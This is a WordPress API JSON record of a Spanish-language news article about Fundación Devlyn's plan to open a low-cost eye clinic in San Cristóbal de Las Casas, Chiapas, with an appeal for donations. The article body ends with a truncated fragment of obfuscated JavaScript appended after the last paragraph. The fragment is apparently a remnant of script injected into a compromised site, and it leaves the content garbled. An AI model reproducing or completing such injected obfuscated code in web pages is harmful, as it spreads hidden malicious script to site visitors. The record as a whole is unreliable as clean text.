{"id":4635,"date":"2022-08-24T02:28:54","date_gmt":"2022-08-24T02:28:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4635"},"modified":"2022-08-24T02:28:55","modified_gmt":"2022-08-24T02:28:55","slug":"instalaran-clinica-oftalmologica-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4635","title":{"rendered":"Instalar\u00e1n cl\u00ednica oftalmol\u00f3gica en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2019-06-18-at-4.28.19-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-4636\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2019-06-18-at-4.28.19-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2019-06-18-at-4.28.19-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2019-06-18-at-4.28.19-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2019-06-18-at-4.28.19-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- La Fundaci\u00f3n Devlyn tiene la intenci\u00f3n de instalar en pr\u00f3ximos meses una cl\u00ednica oftalmol\u00f3gica en esta ciudad, para favorecer a personas de escasos recursos, lo cual forma parte de distintas acciones que se encuentran realizando a favor del sector vulnerable de Chiapas, inform\u00f3 el enlace de este proyecto, Miguel \u00c1ngel Corzo Macal.<\/p>\n\n\n\n<p>En entrevista, coment\u00f3&nbsp;que se trata de un proyecto muy ambicioso, grande e importante, ya que ser\u00eda el primer centro en el pa\u00eds con esas caracter\u00edsticas y record\u00f3 que desde 2012 se inici\u00f3 con una jornada donde se benefici\u00f3 a m\u00e1s de 13 mil personas con lentes.<\/p>\n\n\n\n<p>&#8220;En los \u00faltimos a\u00f1os se dieron beneficios a comunidades y se ha sumado a los largo de este tiempo unos 80 mil chiapanecos beneficiados por esta fundaci\u00f3n, que es ayudada por otras que hacen patrocinios, la intenci\u00f3n de traer est\u00e1 cl\u00ednica a Chiapas es porque hay muchos problemas oftalmol\u00f3gicos, que se refleja en menos capacidad de aprendizaje de los muchachos y la productividad de los artesanos se ve disminuida&#8221;, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Agreg\u00f3 que la intenci\u00f3n de Fundaci\u00f3n Devlyn es tener un centro, un hospital, donde las personas puedan acudir y tengan acceso al servicio con costos muy bajos, &#8220;por ejemplo unos de menos de tres grados puede costar hasta 190 pesos y los m\u00e1s caros van a ser de 400 y otro tipo de servicios&#8221;.<\/p>\n\n\n\n<p>&#8220;La idea es que la gente tenga acceso a la salud visual, pero hay una cosa que nos pide la fundaci\u00f3n que es el acompa\u00f1amiento de la poblaci\u00f3n, ellos como fundaci\u00f3n traen los recursos, el equipo, el personal, financian gran parte del proyecto pero nos piden que acompa\u00f1emos&#8221;<\/p>\n\n\n\n<p>Por \u00faltimo, indic\u00f3 que tienen proyectado iniciar en el mes de octubre, pero necesitan donaciones para amueblar el lugar donde estar\u00e1 esta cl\u00ednica que es en el Ojo de Agua, &#8220;se tiene que entregar en comodato por dos a\u00f1os el inmueble\u00a0\u00a0y queremos hacer una invitaci\u00f3n a c\u00e1maras, clubes, al Municipio, empresarios y a la poblaci\u00f3n que pueda apoyarnos con la renta que es de 5 mil pesos, el propietario lo dej\u00f3 barato por la intenci\u00f3n que se tiene es un espacio grande, el proyecto viene por etapas y es importante la sociedad se sume&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- La Fundaci\u00f3n Devlyn tiene la intenci\u00f3n de instalar en pr\u00f3ximos meses una cl\u00ednica oftalmol\u00f3gica en esta ciudad, para favorecer a personas de escasos recursos, lo cual forma parte de distintas acciones que se encuentran realizando a favor del sector vulnerable de Chiapas, inform\u00f3 el enlace de este proyecto, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4636,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4635","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4635","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4635"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4635\/revisions"}],"predecessor-version":[{"id":4637,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4635\/revisions\/4637"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4636"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4635"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4635"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4635"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}